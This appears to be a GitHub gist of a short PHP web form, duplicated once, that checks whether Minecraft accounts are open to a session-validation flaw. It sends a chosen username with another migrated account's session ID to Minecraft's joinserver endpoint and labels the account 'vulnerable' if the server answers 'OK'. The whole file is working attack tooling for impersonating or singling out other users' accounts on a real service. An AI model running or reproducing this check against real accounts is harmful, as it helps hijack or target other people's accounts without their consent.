ajvpot/gist:3115445

## gistfile1.aw
<?php
$sessid = "herpderp"; //insert a session id from a migrated account here.
if(isset($_POST["name"]) && !empty($_POST["name"])){
    $name=$_POST["name"];
    $url="http://session.minecraft.net/game/joinserver.jsp?user=$name&sessionId=$sessid&serverId=a";
    $res=file_get_contents($url);
    if($res == "OK") die("<b><font color=green>The account ".htmlspecialchars($name)." is vulnerable.</font></b>");
    if($res == "Bad login") die("<font color=red>The account ".htmlspecialchars($name)." is NOT vulnerable or is not migrated.</font>");
    echo "Could not determine status of account ($res)";
}else{
?>
<form name="input" action="" method="post">
Username: <input type="text" name="name" />
<input type="submit" value="Submit" />
</form>
<?php
}
?>
	<?php
	$sessid = "herpderp"; //insert a session id from a migrated account here.
	if(isset($_POST["name"]) && !empty($_POST["name"])){
	$name=$_POST["name"];
	$url="http://session.minecraft.net/game/joinserver.jsp?user=$name&sessionId=$sessid&serverId=a";
	$res=file_get_contents($url);
	if($res == "OK") die("<b><font color=green>The account ".htmlspecialchars($name)." is vulnerable.</font></b>");
	if($res == "Bad login") die("<font color=red>The account ".htmlspecialchars($name)." is NOT vulnerable or is not migrated.</font>");
	echo "Could not determine status of account ($res)";
	}else{
	?>
	<form name="input" action="" method="post">
	Username: <input type="text" name="name" />
	<input type="submit" value="Submit" />
	</form>
	<?php
	}
	?>